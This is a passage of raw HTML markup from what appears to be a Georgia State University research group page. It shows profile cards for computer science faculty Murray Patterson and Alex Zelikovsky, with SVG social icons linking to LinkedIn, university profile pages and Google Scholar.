viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c461-outer\">\n            <div data-colibri-id=\"182-c461\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c461 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c462\" class=\"d-block style-973 style-local-182-c462 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c462-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c462-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c463\" class=\"h-global-transition-all h-heading style-974 style-local-182-c463 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c463\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c464\" class=\"h-text h-text-component style-975 style-local-182-c464 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c465\" class=\"h-text h-text-component style-976 style-local-182-c465 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c466\" class=\"style-977 style-local-182-c466 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c467-outer\">\n            <div data-colibri-id=\"182-c467\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c467 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c468\" class=\"d-block style-973 style-local-182-c468 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c468-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c468-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c469\" class=\"h-global-transition-all h-heading style-974 style-local-182-c469 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c469\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c470\" class=\"h-text h-text-component style-975 style-local-182-c470 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c471\" class=\"h-text h-text-component style-976 style-local-182-c471 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c472\" class=\"style-977 style-local-182-c472 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 